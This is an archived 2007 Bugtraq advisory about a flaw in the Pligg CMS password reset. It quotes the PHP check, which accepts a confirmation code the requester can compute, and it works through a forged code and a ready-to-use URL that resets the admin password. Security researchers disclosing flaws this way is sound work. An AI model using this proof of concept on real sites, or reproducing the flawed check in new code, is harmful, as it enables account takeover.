Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Pligg critical vulnerability

from [242th section] Network Security [Permanent Link]
Subject: Pligg critical vulnerability
Date: Fri, 25 May 2007 15:03:51 +0200 
Pligg critical vulnerability

Concerned version  : 9.5 and ?

Description :

Pligg is a flexible CMS based on PHP and MYSQL.

To reinitialize a forgotten password, Pligg follows a classical
process. A confirmation code is generated and sent by email to the
concerned user mail box. The user has to follow the link containing
the confirmation code and if the confirmation code is checked
successfully, the password is reinitialized to a pre-defined value.


you can find a part of the source code in charge of this check below :


WEB_ROOT/libs/html1.php


[…]

function generateHash($plainText, $salt = null){

   if ($salt === null) {

       $salt = substr(md5(uniqid(rand(), true)), 0, SALT_LENGTH); }

   else {

       $salt = substr($salt, 0, SALT_LENGTH);

       }

   return $salt . sha1($salt . $plainText);

}

[…]



WEB_ROOT/login.php :


[…]

$confirmationcode = $_GET["confirmationcode"];

if(generateHash($username, substr($confirmationcode, 0, SALT_LENGTH))
== $confirmationcode){

$db->query('UPDATE `' . table_users . '` SET `user_pass` =
"033700e5a7759d0663e33b18d6ca0dc2b572c20031b575750" WHERE `user_login`
= "'.$username.'"');

[…]



Unfortunately, as you can read, you can easily generate, for a given
username, a confirmation code that passes successfully the following
check "if(generateHash($username, substr($confirmationcode, 0,
SALT_LENGTH)) == $confirmationcode)"


Example :


Let's choose :
salt = 123456789

and,

username = admin

we have :

sha1(123456789admin) = 1e2f566cbda0a9c855240bf21b8bae030404cad7

and  thus :

confirmationcode = 1234567891e2f566cbda0a9c855240bf21b8bae030404cad7

with the following url you can reinitialize the user admin password :


http://www.domain.com/login.php?processlogin=4&username=admin&confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7


242th.section.

[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Multiple XSS in Digirez, xx_hack_xx_2004
Next by Date:  GTP 3G © Gnuturk Portal System year=**&month= Cross-Site Scripting Vulnerability, vagrant - e-hack.org
Previous by Thread:  Multiple XSS in Digirez, xx_hack_xx_2004
Next by Thread:  Re: Pligg critical vulnerability, crazy frog crazy frog
Indexes:  [Date] [Thread] [Top] [All Lists]